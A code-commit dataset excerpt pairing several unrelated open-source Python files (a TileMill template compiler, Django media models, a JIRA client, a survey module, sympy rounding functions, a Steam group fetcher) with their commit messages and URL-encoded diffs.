        if self.inScript:
            self.script += '<' + tag
            if attrs:
                for key, value in attrs:
                    self.script += ' ' + key + '=' + '"' + value + '"'
            self.script += '/>'

    def handle_starttag(self, tag, attrs):
        # Re-serialise nested tags verbatim while inside a template.
        if self.inScript:
            self.script += '<' + tag
            if attrs:
                for key, value in attrs:
                    self.script += ' ' + key + '=' + '"' + value + '"'
            self.script += '>'
        if tag == 'script':
            # Only scripts with type="text/html" start a template block.
            found = False
            name = ''
            for i in attrs:
                if i[0] == 'type' and i[1] == 'text/html':
                    found = True
                elif i[0] == 'name':
                    name = i[1]
            if found:
                self.inScript = True
                self.scriptName = name

    def handle_endtag(self, tag):
        if tag == 'script' and self.inScript:
            # Template finished: store it and reset the accumulator.
            self.inScript = False
            self.scripts[self.scriptName] = self.script
            self.script = ''
        elif self.inScript:
            self.script += '</' + tag + '>'

    def handle_data(self, data):
        if self.inScript:
            self.script += data
def main():
    """Compile the inline text/html templates in index.html into
    js/includes/template.cache.js as pre-built JavaScript functions."""
    html_path = os.path.join(os.path.dirname(__file__), 'index.html')
    buffer = open(html_path)
    data = buffer.read()
    buffer.close()
    parser = Compiler()
    parser.feed(data)
    parser.close()
    scripts = ''
    for name, script in parser.scripts.items():
        # Convert the template into pure JavaScript
        # NOTE(review): the substitutions below translate the micro-template
        # syntax (<% ... %>, <%= ... %>) into p.push() string fragments; the
        # order of replacements is significant -- do not reorder.
        scr = re.sub(r'\s+', ' ', re.sub(r"(\r|\t|\n)", ' ', script))
        scr = scr.replace('<%', '\t')
        scr = re.sub(r"((^|%>)[^\t]*)'", r'\1\n', scr)
        scr = scr.replace("'", "\\'")
        scr = re.sub(r"\t=(.*?)%>", "',\\1,'", scr)
        scr = scr.replace("\t", "');").replace('%>', "p.push('").replace("\n", "\\'")
        scr = "TileMill.templates['%s']=function(obj) {var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push('" % (name) + scr + "');}return p.join(''); }\n"
        scripts += scr
    js_path = os.path.join(os.path.dirname(__file__), 'js', 'includes', 'template.cache.js')
    buffer = open(js_path, 'w')
    buffer.write(scripts)
    buffer.close()

if __name__ == "__main__":
    main()
|
Python
| 0.000001
|
@@ -272,16 +272,37 @@
ts = %7B%7D%0A
+ javascripts = %7B%7D%0A
inSc
@@ -925,21 +925,17 @@
-found = False
+name = ''
%0A
@@ -935,36 +935,38 @@
''%0A
-name
+target
= ''%0A
@@ -1020,33 +1020,237 @@
ype'
- and i%5B1%5D == 'text/html':
+:%0A if i%5B1%5D == 'text/html':%0A self.inScript = True;%0A elif i%5B1%5D == 'text/javascript':%0A # Evaluate the target and built it for the necesarry runtime.
%0A
@@ -1367,31 +1367,8 @@
if
-found:%0A
self
@@ -1376,23 +1376,17 @@
inScript
- = True
+:
%0A
|
233916de4fae7430ac28856939767f639fefd19d
|
Fix issue with FileRefField.
|
cms/apps/media/models.py
|
cms/apps/media/models.py
|
"""Models used by the static media management application."""
from __future__ import unicode_literals
from PIL import Image
from django.db import models
from django.contrib import admin
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
from django.utils.encoding import python_2_unicode_compatible
import os
@python_2_unicode_compatible
class Label(models.Model):

    """
    A notional label used to organise static media.

    This does not correspond to a physical label on the disk.
    """

    # Human-readable label name; also the sort key (see Meta.ordering).
    name = models.CharField(max_length=200)

    def __str__(self):
        """Returns the name of the label."""
        return self.name

    class Meta:
        ordering = ("name",)
@python_2_unicode_compatible
class File(models.Model):

    """A static file."""

    title = models.CharField(max_length=200,
                             help_text="The title will be used as the default rollover text when this media is embedded in a web page.")
    labels = models.ManyToManyField(
        Label,
        blank=True,
        help_text="Labels are used to help organise your media. They are not visible to users on your website.",
    )
    file = models.FileField(
        upload_to="uploads/files",
        max_length=250,
    )

    def get_absolute_url(self):
        """Generates the absolute URL of the image."""
        return self.file.url

    def __str__(self):
        """Returns the title of the media."""
        return self.title

    class Meta:
        ordering = ("title",)

    def is_image(self):
        """Whether the file's extension maps to the admin's image icon."""
        from .admin import FILE_ICONS, IMAGE_FILE_ICON, UNKNOWN_FILE_ICON
        _, extension = os.path.splitext(self.file.name)
        extension = extension.lower()[1:]
        icon = FILE_ICONS.get(extension, UNKNOWN_FILE_ICON)
        return icon == IMAGE_FILE_ICON

    def _image_size(self):
        """Return (width, height) of the image file, or (0, 0) if the file
        cannot be parsed as an image.

        Extracted helper: width() and height() previously duplicated this
        open/verify logic.
        """
        with open(self.file.path, "rb") as f:
            try:
                image = Image.open(f)
            except IOError:
                return (0, 0)
            image.verify()
            return image.size

    def width(self):
        """Pixel width of the image, or 0 for non-image/unreadable files."""
        return self._image_size()[0] if self.is_image() else 0

    def height(self):
        """Pixel height of the image, or 0 for non-image/unreadable files."""
        return self._image_size()[1] if self.is_image() else 0
class FileRefField(models.ForeignKey):

    """A foreign key to a File.

    (The docstring previously claimed image files only; this base field does
    not restrict the file type -- see ImageRefField/VideoFileRefField.)
    """

    def __init__(self, **kwargs):
        kwargs["to"] = File
        kwargs.setdefault("related_name", "+")
        kwargs.setdefault("on_delete", models.PROTECT)
        super(FileRefField, self).__init__(**kwargs)

    def formfield(self, **kwargs):
        defaults = {
            "widget": ForeignKeyRawIdWidget(self.rel, admin.site),
        }
        # Honour caller-supplied form-field options; they were previously
        # discarded, which silently ignored e.g. required/label overrides.
        defaults.update(kwargs)
        return super(FileRefField, self).formfield(**defaults)
# limit_choices_to filter that selects image files by extension.
IMAGE_FILTER = {
    "file__iregex": r"\.(png|gif|jpg|jpeg)$"
}
class ImageRefField(FileRefField):

    """File reference restricted to image files (png/gif/jpg/jpeg)."""

    def __init__(self, **kwargs):
        kwargs.update(limit_choices_to=IMAGE_FILTER)
        super(ImageRefField, self).__init__(**kwargs)
# limit_choices_to filter that selects video files by extension.
VIDEO_FILTER = {
    "file__iregex": r"\.(webm|mp4|m4v)$"
}
class VideoFileRefField(FileRefField):

    """File reference restricted to video files (webm/mp4/m4v)."""

    def __init__(self, **kwargs):
        kwargs.update(limit_choices_to=VIDEO_FILTER)
        super(VideoFileRefField, self).__init__(**kwargs)
@python_2_unicode_compatible
class Video(models.Model):

    """A video with an optional poster image and up to three encodings."""

    title = models.CharField(
        max_length=200,
    )
    # Optional poster/thumbnail image.
    image = ImageRefField(
        blank=True,
        null=True,
    )
    high_resolution_mp4 = VideoFileRefField(
        verbose_name="high resolution MP4",
        blank=True,
        null=True,
    )
    low_resolution_mp4 = VideoFileRefField(
        verbose_name="low resolution MP4",
        blank=True,
        null=True
    )
    webm = VideoFileRefField(
        verbose_name="WebM",
        blank=True,
        null=True,
    )

    def __str__(self):
        """Returns the title of the media."""
        return self.title

    class Meta:
        ordering = ("title",)
class VideoRefField(models.ForeignKey):

    """A foreign key to a Video.

    (The docstring previously claimed this pointed at File/image files; the
    field actually targets the Video model.)
    """

    def __init__(self, **kwargs):
        kwargs["to"] = Video
        kwargs.setdefault("related_name", "+")
        kwargs.setdefault("on_delete", models.PROTECT)
        super(VideoRefField, self).__init__(**kwargs)

    def formfield(self, **kwargs):
        defaults = {
            "widget": ForeignKeyRawIdWidget(self.rel, admin.site),
        }
        # Honour caller-supplied form-field options; they were previously
        # discarded, which silently ignored e.g. required/label overrides.
        defaults.update(kwargs)
        return super(VideoRefField, self).formfield(**defaults)
|
Python
| 0
|
@@ -2565,28 +2565,75 @@
+if 'to' in kwargs:%0A del
kwargs%5B
-%22to%22%5D
+'to'%5D%0A%0A to
= File%0A
|
7dffc7115b5e91ba13de8cb3e306832be7f8e185
|
print result in show components
|
client/jiraffe.py
|
client/jiraffe.py
|
import urllib
import os
# Endpoints of the jiraffe REST service.
SERVICE_URL = "http://jiraffe.cloudhub.io/api"
CREATE_SERVICE = SERVICE_URL + "/issues"  # create / fetch issues
DEFAULT_SERVICE = SERVICE_URL + "/defaults"  # stored default field values
COMPONENT_SERVICE = SERVICE_URL + "/components"  # project components
def get_valid_reporter(reporter):
    """Return `reporter`, substituting the JIRA_ID environment variable
    when the supplied value is the empty string."""
    return os.environ['JIRA_ID'] if reporter == "" else reporter
def createIssue(project, summary, bug_type, sprint, reporter, assignee, priority, component):
    """Create a JIRA issue via the jiraffe service and print the response.

    Only non-empty fields are sent. `reporter` and `assignee` fall back to
    the JIRA_ID environment variable when empty. NOTE: `component` is
    accepted for interface compatibility but is not currently sent.

    Fix: removed the unused `headers` local (urlopen never used it) and the
    dead commented-out debug print.
    """
    query_args = {'summary': summary, 'reporter': get_valid_reporter(reporter)}
    if project != "":
        query_args['project'] = project
    if bug_type != "":
        query_args['type'] = bug_type
    if sprint != "":
        query_args['sprint'] = sprint
    valid_assignee = get_valid_reporter(assignee)
    if valid_assignee != "":
        query_args['assignee'] = valid_assignee
    if priority != "":
        query_args['priority'] = priority
    encoded_args = urllib.urlencode(query_args)
    print(urllib.urlopen(CREATE_SERVICE + "?" + encoded_args, encoded_args).read())
def update_defaults(project, sprint, bug_type):
#{"sprint":"123","type":"Bug","project":"AUTOMATION","id":9}
query_args = {}
if project != "":
query_args['project'] = project
if bug_type != "":
query_args['type'] = bug_type
if sprint != "":
query_args['sprint'] = sprint
encoded_args = urllib.urlencode(query_args)
#print(encoded_args)
headers = {"content-type": "application/plain-text"}
print(urllib.urlopen(DEFAULT_SERVICE +"?"+ encoded_args, encoded_args).read())
def show_issue(issue_id):
response = urllib.urlopen(CREATE_SERVICE + "/" + issue_id)
print(response.read())
def show_components(project_id):
query_args = {}
if project_id != "":
query_args['project'] = project_id
encoded_args = urllib.urlencode(query_args)
response = urllib.urlopen(COMPONENT_SERVICE+ "?" + encoded_args)
def show_defaults():
response = urllib.urlopen(DEFAULT_SERVICE)
print(response.read())
|
Python
| 0
|
@@ -1963,16 +1963,42 @@
d_args)%0A
+ print(response.read())
%0A%0Adef sh
|
a7e45cc5cd9ec9d706b4160f988616d87e185cb8
|
FIX survey validate_questions
|
survey_conditional_questions/survey.py
|
survey_conditional_questions/survey.py
|
# -*- coding: utf-8 -*-
from openerp import fields, models
class survey_question(models.Model):
_inherit = 'survey.question'
conditional = fields.Boolean(
'Conditional Question',
copy=False,
# we add copy = false to avoid wrong link on survey copy,
# should be improoved
)
question_conditional_id = fields.Many2one(
'survey.question',
'Question',
copy=False,
help="In order to edit this field you should first save the question"
)
answer_id = fields.Many2one(
'survey.label',
'Answer',
copy=False,
)
# NO HACEMOS ESTA MOD GENERICA PORQUE DA ERROR AL ALMACENAR LOS CHOICE
# def validate_question(
# self, cr, uid, question, post, answer_tag, context=None):
# """We add answer_tag if not in post because it gets an error in this
# method, this happens when question is not display so the answer_tag
# value is no on post dictionary"""
# if answer_tag not in post:
# post[answer_tag] = ''
# return super(survey_question, self).validate_question(
# cr, uid, question, post, answer_tag, context=context)
def validate_free_text(
self, cr, uid, question, post, answer_tag, context=None):
"""We add answer_tag if not in post because it gets an error in this
method, this happens when question is not display so the answer_tag
value is no on post dictionary"""
if answer_tag not in post:
post[answer_tag] = ''
return super(survey_question, self).validate_free_text(
cr, uid, question, post, answer_tag, context=context)
def validate_textbox(
self, cr, uid, question, post, answer_tag, context=None):
"""We add answer_tag if not in post because it gets an error in this
method, this happens when question is not display so the answer_tag
value is no on post dictionary"""
if answer_tag not in post:
post[answer_tag] = ''
return super(survey_question, self).validate_textbox(
cr, uid, question, post, answer_tag, context=context)
def validate_numerical_box(
self, cr, uid, question, post, answer_tag, context=None):
"""We add answer_tag if not in post because it gets an error in this
method, this happens when question is not display so the answer_tag
value is no on post dictionary"""
if answer_tag not in post:
post[answer_tag] = ''
return super(survey_question, self).validate_numerical_box(
cr, uid, question, post, answer_tag, context=context)
def validate_datetime(
self, cr, uid, question, post, answer_tag, context=None):
"""We add answer_tag if not in post because it gets an error in this
method, this happens when question is not display so the answer_tag
value is no on post dictionary"""
if answer_tag not in post:
post[answer_tag] = ''
return super(survey_question, self).validate_datetime(
cr, uid, question, post, answer_tag, context=context)
class survey_user_input(models.Model):
_inherit = 'survey.user_input'
def get_list_questions(self, cr, uid, survey, user_input_id):
obj_questions = self.pool['survey.question']
obj_user_input_line = self.pool['survey.user_input_line']
questions_to_hide = []
question_ids = obj_questions.search(
cr,
uid,
[('survey_id', '=', survey.id)])
for question in obj_questions.browse(cr, uid, question_ids):
if question.conditional:
for question2 in obj_questions.browse(cr, uid, question_ids):
if question2 == question.question_conditional_id:
input_answer_id = obj_user_input_line.search(
cr,
uid,
[('user_input_id', '=', user_input_id),
('question_id', '=', question2.id)])
if question.answer_id != obj_user_input_line.browse(
cr,
uid,
input_answer_id).value_suggested:
questions_to_hide.append(question.id)
return questions_to_hide
|
Python
| 0
|
@@ -52,16 +52,70 @@
models%0A
+import logging%0A%0A_logger = logging.getLogger(__name__)%0A
%0A%0Aclass
@@ -674,85 +674,8 @@
%0A
- # NO HACEMOS ESTA MOD GENERICA PORQUE DA ERROR AL ALMACENAR LOS CHOICE%0A #
def
@@ -689,34 +689,32 @@
te_question(%0A
- #
self, c
@@ -771,357 +771,165 @@
%0A
- #
-%22%22%22We add answer_tag if not in post because it gets an error in this%0A # method, this happens when question is not display so the answer_tag%0A # value is no on post dictionary%22%22%22%0A # if answer_tag not in post:%0A # post%5Banswer_tag%5D = ''%0A # return super(survey_question, self).validate_question
+''' Validate question, depending on question type and parameters '''%0A%0A input_answer_id = self.pool%5B'survey.user_input_line'%5D.search
(%0A
-#
cr
@@ -920,34 +920,32 @@
-
cr, uid,
question, p
@@ -936,1472 +936,514 @@
uid,
- question, post, answer_tag, context=context)%0A def validate_free_text(%0A self, cr, uid, question, post, answer_tag, context=None):%0A %22%22%22We add answer_tag if not in post because it gets an error in this%0A method, this happens when question is not display so the answer_tag%0A value is no on post
+%0A %5B('user_input_id.token', '=', post.get('token')),%0A ('question_id', '=', question.question_con
di
-c
tiona
-ry%22%22%22%0A if answer_tag not in post:%0A post%5Banswer_tag%5D = ''%0A return super(survey_question, self).validate_free_text(%0A cr, uid, question, post, answer_tag, context=context)%0A%0A def validate_textbox(%0A self, cr, uid, question, post, answer_tag, context=None):%0A %22%22%22We add answer_tag if not in post because it gets an error in this%0A method, this happens when question is not display so the answer_tag%0A value is no on post dictionary%22%22%22%0A if answer_tag not in post:%0A post%5Banswer_tag%5D = ''%0A return super(survey_question, self).validate_textbox(%0A cr, uid, question, post, answer_tag, context=context)%0A%0A def validate_numerical_box(%0A self, cr, uid, question, post, answer_tag, context=None):%0A %22%22%22We add answer_tag if not in post because it gets an error in this%0A method, this happens when question is not display so the answer_tag%0A value is no on post dictionary%22%22%22%0A if answer_tag not in post:%0A post%5Banswer_tag%5D = ''%0A return super(survey_question, self).validate_numerical_box(%0A
+l_id.id)%5D)%0A try:%0A checker = getattr(self, 'validate_' + question.type)%0A except AttributeError:%0A _logger.warning(%0A question.type + %22: This type of question has no validation method%22)%0A return %7B%7D%0A else:%0A if question.conditional and question.answer_id != self.pool%5B'survey.user_input_line'%5D.browse(%0A
@@ -1447,32 +1447,33 @@
+
cr, uid,
question, p
@@ -1464,380 +1464,105 @@
uid,
- question, post, answer_tag, context=context)%0A%0A def validate_datetime(%0A self, cr, uid, question, post, answer_tag, context=None):%0A %22%22%22We add answer_tag if not in post because it gets an error in this%0A method, this happens when question is not display so the answer_tag%0A value is no on post dictionary%22%22%22%0A if answer_tag not in post
+%0A input_answer_id).value_suggested:%0A return %7B%7D%0A else
:%0A
@@ -1572,109 +1572,30 @@
-
- post%5Banswer_tag%5D = ''%0A
-
return
-super(survey_question, self).validate_datetime(%0A
+checker(
cr,
|
f6be438e01a499dc2bde6abfa5a00fb281db7b83
|
Add account_id as the element of this class
|
kamboo/core.py
|
kamboo/core.py
|
import botocore
from kotocore.session import Session
class KambooConnection(object):
"""
Kamboo connection with botocore session initialized
"""
session = botocore.session.get_session()
def __init__(self, service_name="ec2", region_name="us-east-1",
credentials=None):
self.region = region_name
self.credentials = credentials
if self.credentials:
self.session.set_credentials(**self.credentials)
Connection = Session(session=self.session).get_connection(service_name)
self.conn = Connection(region_name=self.region)
|
Python
| 0.000001
|
@@ -267,16 +267,50 @@
ast-1%22,%0A
+ account_id=None,%0A
@@ -371,16 +371,53 @@
on_name%0A
+ self.account_id = account_id%0A
|
a76b866862874ce52c762b4e0381b233917a977a
|
Increment version
|
karld/_meta.py
|
karld/_meta.py
|
version_info = (0, 2, 6)
version = '.'.join(map(str, version_info))
|
Python
| 0.000002
|
@@ -19,9 +19,9 @@
2,
-6
+7
)%0Ave
|
8868f2715e4e2d0c2554af4d7b08074574c9543f
|
Adopt RoundFunction class to work around (real*I).is_real is None
|
sympy/functions/elementary/integers.py
|
sympy/functions/elementary/integers.py
|
from __future__ import print_function, division
from sympy.core.basic import C
from sympy.core.singleton import S
from sympy.core.function import Function
from sympy.core import Add
from sympy.core.evalf import get_integer_part, PrecisionExhausted
###############################################################################
######################### FLOOR and CEILING FUNCTIONS #########################
###############################################################################
class RoundFunction(Function):
"""The base class for rounding functions."""
@classmethod
def eval(cls, arg):
if arg.is_integer:
return arg
if arg.is_imaginary:
return cls(C.im(arg))*S.ImaginaryUnit
v = cls._eval_number(arg)
if v is not None:
return v
# Integral, numerical, symbolic part
ipart = npart = spart = S.Zero
# Extract integral (or complex integral) terms
terms = Add.make_args(arg)
for t in terms:
if t.is_integer or (t.is_imaginary and C.im(t).is_integer):
ipart += t
elif t.has(C.Symbol):
spart += t
else:
npart += t
if not (npart or spart):
return ipart
# Evaluate npart numerically if independent of spart
if npart and (
not spart or
npart.is_real and spart.is_imaginary or
npart.is_imaginary and spart.is_real):
try:
re, im = get_integer_part(
npart, cls._dir, {}, return_ints=True)
ipart += C.Integer(re) + C.Integer(im)*S.ImaginaryUnit
npart = S.Zero
except (PrecisionExhausted, NotImplementedError):
pass
spart = npart + spart
if not spart:
return ipart
elif spart.is_imaginary:
return ipart + cls(C.im(spart), evaluate=False)*S.ImaginaryUnit
else:
return ipart + cls(spart, evaluate=False)
def _eval_is_bounded(self):
return self.args[0].is_bounded
def _eval_is_real(self):
return self.args[0].is_real
def _eval_is_integer(self):
return self.args[0].is_real
class floor(RoundFunction):
"""
Floor is a univariate function which returns the largest integer
value not greater than its argument. However this implementation
generalizes floor to complex numbers.
More information can be found in "Concrete mathematics" by Graham,
pp. 87 or visit http://mathworld.wolfram.com/FloorFunction.html.
>>> from sympy import floor, E, I, Float, Rational
>>> floor(17)
17
>>> floor(Rational(23, 10))
2
>>> floor(2*E)
5
>>> floor(-Float(0.567))
-1
>>> floor(-I/2)
-I
See Also
========
ceiling
"""
_dir = -1
@classmethod
def _eval_number(cls, arg):
if arg.is_Number:
if arg.is_Rational:
return C.Integer(arg.p // arg.q)
elif arg.is_Float:
return C.Integer(int(arg.floor()))
else:
return arg
if arg.is_NumberSymbol:
return arg.approximation_interval(C.Integer)[0]
def _eval_nseries(self, x, n, logx):
r = self.subs(x, 0)
args = self.args[0]
args0 = args.subs(x, 0)
if args0 == r:
direction = (args - args0).leadterm(x)[0]
if direction.is_positive:
return r
else:
return r - 1
else:
return r
class ceiling(RoundFunction):
"""
Ceiling is a univariate function which returns the smallest integer
value not less than its argument. Ceiling function is generalized
in this implementation to complex numbers.
More information can be found in "Concrete mathematics" by Graham,
pp. 87 or visit http://mathworld.wolfram.com/CeilingFunction.html.
>>> from sympy import ceiling, E, I, Float, Rational
>>> ceiling(17)
17
>>> ceiling(Rational(23, 10))
3
>>> ceiling(2*E)
6
>>> ceiling(-Float(0.567))
0
>>> ceiling(I/2)
I
See Also
========
floor
"""
_dir = 1
@classmethod
def _eval_number(cls, arg):
if arg.is_Number:
if arg.is_Rational:
return -C.Integer(-arg.p // arg.q)
elif arg.is_Float:
return C.Integer(int(arg.ceiling()))
else:
return arg
if arg.is_NumberSymbol:
return arg.approximation_interval(C.Integer)[1]
def _eval_nseries(self, x, n, logx):
r = self.subs(x, 0)
args = self.args[0]
args0 = args.subs(x, 0)
if args0 == r:
direction = (args - args0).leadterm(x)[0]
if direction.is_positive:
return r + 1
else:
return r
else:
return r
|
Python
| 0.999728
|
@@ -676,32 +676,65 @@
arg.is_imaginary
+ or (S.ImaginaryUnit*arg).is_real
:%0A re
@@ -1452,24 +1452,25 @@
is_real and
+(
spart.is_ima
@@ -1478,16 +1478,52 @@
inary or
+ (S.ImaginaryUnit*spart).is_real) or
%0A
@@ -1983,16 +1983,51 @@
maginary
+ or (S.ImaginaryUnit*spart).is_real
:%0A
|
31d7df470dbaf996f4f3c7639107ec04afda1ec4
|
Update runcount.py
|
bin/runcount.py
|
bin/runcount.py
|
#!/usr/bin/python
import os
from count import countfile
import common
def runAll(args):
print('\n\n\nYou have requested to count unique sam files')
print('\tWARNING:')
print('\t\tIF USING ANY REFERENCES OTHER THAN THOSE I PROVIDE I CANNOT GUARANTEE RESULT ACCURACY')
print('\n')
#set up environment#
args.SamDirectory = common.fixDirName(args.SamDirectory)
countDir = os.path.dirname(args.SamDirectory[:-1]) + '/' + BinCounts + '/'
if args.output:
countDir = common.fixDirName(args.output)
statsDir = os.path.dirname(args.SamDirectory[:-1]) + '/' + PipelineStats + '/'
if args.statdir:
statsDir = common.fixDirName(args.statdir)
for i in [countDir, statsDir]:
common.makeDir(i)
samFiles = common.getSampleList(args.SamDirectory, args.samples, 'sam')
#run multiprocessing of all mapping commands#
argList = [(x, countDir, statsDir, args.species) for x in samFiles]
common.daemon(countfile.runOne, argList, 'count sam files')
print('\nBin counts complete\n\n\n')
|
Python
| 0.000001
|
@@ -831,12 +831,17 @@
all
-mapp
+bin count
ing
|
e6520bb2c2f016f39ae76bfb15dd62cfdb2fdf63
|
update rcomp CLI index printing, given new serv format
|
frontend/rcomp/cli.py
|
frontend/rcomp/cli.py
|
"""command-line interface (CLI)
For local development, use the `--rcomp-server` switch to direct this
client at the localhost. E.g.,
rcomp --rcomp-server http://127.0.0.1:8000
"""
import argparse
import sys
import json
import requests
from . import __version__
def main(argv=None):
parser = argparse.ArgumentParser(prog='rcomp', add_help=False)
parser.add_argument('--rcomp-help', action='store_true',
dest='show_help',
help='print this help message and exit')
parser.add_argument('--rcomp-version', action='store_true',
dest='show_version',
help='print version number and exit')
parser.add_argument('--rcomp-server', metavar='URI',
dest='base_uri',
help=('base URI for job requests.'
' (default is https://api.fmtools.org)'))
parser.add_argument('--rcomp-nonblocking', action='store_true',
dest='nonblocking', default=False,
help=('Default behavior is to wait for remote job'
' to complete. Use this switch to immediately'
' return after job successfully starts.'))
parser.add_argument('--rcomp-continue', metavar='JOBID',
dest='job_id', default=None, nargs='?',
help='')
parser.add_argument('COMMAND', nargs='?')
parser.add_argument('ARGV', nargs=argparse.REMAINDER)
if argv is None:
args = parser.parse_args()
else:
args = parser.parse_args(argv)
if args.show_help:
parser.print_help()
return 0
if args.show_version:
print('rcomp '+__version__)
return 0
if args.base_uri is None:
base_uri = 'https://api.fmtools.org'
else:
base_uri = args.base_uri
if args.COMMAND is None:
res = requests.get(base_uri+'/')
if res.ok:
index = json.loads(res.text)
assert 'commands' in index
print('The following commands are available at {}'
.format(base_uri))
for cmd in index['commands']:
print('{NAME} {SUMMARY}'
.format(NAME=cmd['name'], SUMMARY=cmd['summary']))
else:
res = requests.get(base_uri+'/' + args.COMMAND)
if res.ok:
print(res.text)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
Python
| 0
|
@@ -2218,16 +2218,25 @@
mmands'%5D
+.values()
:%0A
|
710dc66b04b5864fc4321e273eada1cce202c9cf
|
Refactor LineOnMesh.py
|
src/Python/DataManipulation/LineOnMesh.py
|
src/Python/DataManipulation/LineOnMesh.py
|
#!/usr/bin/env python
import vtk
import random
import numpy
# Make a 32 x 32 grid
size = 32
# Define z values for the topography
topography = numpy.zeros([size, size])
for i in range(size):
for j in range(size):
topography[i][j] = random.randrange(0, 5)
# Define points, triangles and colors
colors = vtk.vtkUnsignedCharArray()
colors.SetNumberOfComponents(3)
points = vtk.vtkPoints()
triangles = vtk.vtkCellArray()
# Build the meshgrid manually
count = 0
for i in range(size - 1):
for j in range(size - 1):
z1 = topography[i][j]
z2 = topography[i][j + 1]
z3 = topography[i + 1][j]
# Triangle 1
points.InsertNextPoint(i, j, z1)
points.InsertNextPoint(i, (j + 1), z2)
points.InsertNextPoint((i + 1), j, z3)
triangle = vtk.vtkTriangle()
triangle.GetPointIds().SetId(0, count)
triangle.GetPointIds().SetId(1, count + 1)
triangle.GetPointIds().SetId(2, count + 2)
triangles.InsertNextCell(triangle)
z1 = topography[i][j + 1]
z2 = topography[i + 1][j + 1]
z3 = topography[i + 1][j]
# Triangle 2
points.InsertNextPoint(i, (j + 1), z1)
points.InsertNextPoint((i + 1), (j + 1), z2)
points.InsertNextPoint((i + 1), j, z3)
triangle = vtk.vtkTriangle()
triangle.GetPointIds().SetId(0, count + 3)
triangle.GetPointIds().SetId(1, count + 4)
triangle.GetPointIds().SetId(2, count + 5)
count += 6
triangles.InsertNextCell(triangle)
# Add some color
r = [int(i / float(size) * 255), int(j / float(size) * 255), 0]
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
# Create a polydata object
trianglePolyData = vtk.vtkPolyData()
# Add the geometry and topology to the polydata
trianglePolyData.SetPoints(points)
trianglePolyData.GetPointData().SetScalars(colors)
trianglePolyData.SetPolys(triangles)
# Clean the polydata so that the edges are shared !
cleanPolyData = vtk.vtkCleanPolyData()
cleanPolyData.SetInputData(trianglePolyData)
# Use a filter to smooth the data (will add triangles and smooth)
smooth_loop = vtk.vtkLoopSubdivisionFilter()
smooth_loop.SetNumberOfSubdivisions(3)
smooth_loop.SetInputConnection(cleanPolyData.GetOutputPort())
# Create a mapper and actor for smoothed dataset
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(smooth_loop.GetOutputPort())
actor_loop = vtk.vtkActor()
actor_loop.SetMapper(mapper)
actor_loop.GetProperty().SetInterpolationToFlat()
# Update the pipeline so that vtkCellLocator finds cells !
smooth_loop.Update()
# Define a cellLocator to be able to compute intersections between lines
# and the surface
locator = vtk.vtkCellLocator()
locator.SetDataSet(smooth_loop.GetOutput())
locator.BuildLocator()
maxloop = 1000
dist = 20.0 / maxloop
tolerance = 0.001
# Make a list of points. Each point is the intersection of a vertical line
# defined by p1 and p2 and the surface.
points = vtk.vtkPoints()
for i in range(maxloop):
p1 = [2 + i * dist, 16, -1]
p2 = [2 + i * dist, 16, 6]
# Outputs (we need only pos which is the x, y, z position
# of the intersection)
t = vtk.mutable(0)
pos = [0.0, 0.0, 0.0]
pcoords = [0.0, 0.0, 0.0]
subId = vtk.mutable(0)
locator.IntersectWithLine(p1, p2, tolerance, t, pos, pcoords, subId)
# Add a slight offset in z
pos[2] += 0.01
# Add the x, y, z position of the intersection
points.InsertNextPoint(pos)
# Create a spline and add the points
spline = vtk.vtkParametricSpline()
spline.SetPoints(points)
functionSource = vtk.vtkParametricFunctionSource()
functionSource.SetUResolution(maxloop)
functionSource.SetParametricFunction(spline)
# Map the spline
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(functionSource.GetOutputPort())
# Define the line actor
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor([1.0, 0.0, 0.0])
actor.GetProperty().SetLineWidth(3)
# Visualize
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
# Add actors and render
renderer.AddActor(actor)
renderer.AddActor(actor_loop)
renderer.SetBackground(1, 1, 1) # Background color white
renderWindow.SetSize(800, 800)
renderWindow.Render()
renderWindowInteractor.Start()
|
Python
| 0.000001
|
@@ -38,27 +38,19 @@
ort
-random%0Aimport numpy
+numpy as np
%0A%0A%0A#
@@ -122,143 +122,103 @@
phy%0A
-topography = numpy.zeros(%5Bsize, size%5D)%0Afor i in range(size):%0A for j in range(size):%0A topography%5Bi%5D%5Bj%5D = random.randrange(0, 5
+z_min = 0%0Az_max = 5%0Atopography = (z_max * np.random.random_sample((size, size)) + z_min).round(
)%0A%0A#
|
c4a0a83fe4a028b1d571058aed755be5b4714531
|
fix logging
|
includes/SteamGroupMembers.py
|
includes/SteamGroupMembers.py
|
import logging
import urllib2
import xml.etree.ElementTree as ElementTree
logger = logging.getLogger()
class SteamGroupMembers(object):
"""
Retrives all members of the specified group.
"""
_members = None
def __init__(self, group_id):
self._group_id = group_id
def __len__(self):
return len(self._get_members())
def __contains__(self, item):
return item in self._get_members()
def __iter__(self):
return self._get_members().__iter__()
def _get_members(self):
if self._members is None:
self._members = []
url = 'http://steamcommunity.com/gid/%s/memberslistxml/?xml=1' % self._group_id
while True:
logger.debug('Requesting %s', url)
responce = urllib2.urlopen(url)
xml = ElementTree.parse(responce).getroot()
members_elements = xml.findall('members/steamID64')
logger.info('Found %d members in group %d', len(members_elements), self._group_id)
members = map(lambda e: e.text, members_elements)
self._members.extend(members)
next_page = xml.find('nextPageLink')
if next_page is not None:
logger.debug('Found next page link')
url = next_page.text
else:
break
return self._members
|
Python
| 0.000002
|
@@ -701,70 +701,83 @@
-while True:%0A logger.debug('Requesting %25s', url)
+logger.debug('Loading steam group members %25s', url)%0A while True:
%0A
@@ -953,106 +953,8 @@
4')%0A
- logger.info('Found %25d members in group %25d', len(members_elements), self._group_id)
%0A
@@ -1181,44 +1181,28 @@
-logger.debug('Found
+url =
next
-
+_
page
- link')
+.text
%0A
@@ -1218,36 +1218,79 @@
-url =
+logger.debug('Loading steam group members (
next
-_
+
page
-.text
+) %25s', url)
%0A
@@ -1330,16 +1330,109 @@
break%0A
